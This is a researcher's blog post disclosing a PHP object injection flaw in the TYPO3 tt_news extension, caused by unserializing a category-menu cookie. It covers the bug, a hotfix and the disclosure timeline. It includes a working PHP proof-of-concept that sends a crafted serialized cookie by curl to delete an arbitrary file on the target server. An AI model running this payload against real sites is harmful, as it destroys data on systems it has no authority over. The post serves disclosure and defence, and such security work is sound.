pascal jungblut posts

Object Injection Vulnerability in tt_news

Disclaimer: I reported this vulnerability on September 12th, 2013 and got a response by September 16th. Nothing happened since. I asked for an update on February 4th and haven’t received a response, yet. Update February 12th: The TYPO3 security team released a security bulletin and a fixed version for the issue. Thanks!

Object Injection

What is object injection and why is it a problem? An object injection vulnerability allows the attacker to instantiate arbitrary objects. Just think of something like this:

unserialize($_GET['my_param']);

If the object you create evals somehing in the constructor __wakeup() or, say, unlinks a file in the destructor, the attacker will be able to make some damage. For more information see the OWASP wiki on ‘PHP Object Injection’.

Bug

“tt_news” is the most common extension to display news on a TYPO3-powered website. It can display a category menu, so the user can switch between several news categories. The state gets serialized and then saved in a cookie. In another request, the cookie will be loaded and unserialized. Users send cookies.

<?php
// lib/class.tx_ttnews_catmenu.php:337
$this->stored = unserialize($_COOKIE[$this->treeName]);
?>

Affected is tt_news >= 3.0.0.

Hotfix

Store the data in a session instead. Note that only sites that display the CATMENU plugin are affected.

PoC

  1. Load Swift_ByteStream_TemporaryFileByteStream
  2. Set path to delete
  3. ????
  4. Profit
<?php
if (!isset($argv[1]) || !isset($argv[2])) die('usage:' . $argv[0] . " <news_url> <file_to_delete>\n");

// load the typo3 mailer. it will include swift
// the Swift_ByteStream_TemporaryFileByteStream will unlink $this->_path in the destructor
$payload = 'a:2:{i:500;O:26:"TYPO3\CMS\Core\Mail\Mailer":0:{}i:501;O:40:"Swift_ByteStream'.
'_TemporaryFileByteStream":1:{s:38:"' ."\0" . 'Swift_ByteStream_FileByteStream' . "\0".
'_path";s:' . strlen($argv[2]) . ':"'. $argv[2] .'";}}}';

$c = curl_init(); 
curl_setopt($c, CURLOPT_URL, $argv[1] . '?no_cache=1'); 
curl_setopt($c, CURLOPT_COOKIE, 'ttnewscat=' . urlencode($payload));
curl_exec($c);
curl_close($c);

After a bit of experimenting I was able to write arbitrary files to disk.

Responsible Disclosure

It was the first time I approached a major open source project with a (rather small) vulnerability. I chose responsible disclosure because I see no point in unnecessarily harming anyone. However, although this extension is not part of the core CMS and not that many instances may be affected by this particular bug, it’s still a widely spread extension and you can download it from the official TYPO3 website (like any other extension, too). The project encourages you to disclose security bugs in extensions to the security team. I’m a bit disappointed about the whole experience. I recently found a major bug in the CMS core itself and a working exploit is almost ready, but I’m not sure anymore if I want to go down the responsible disclosure road again.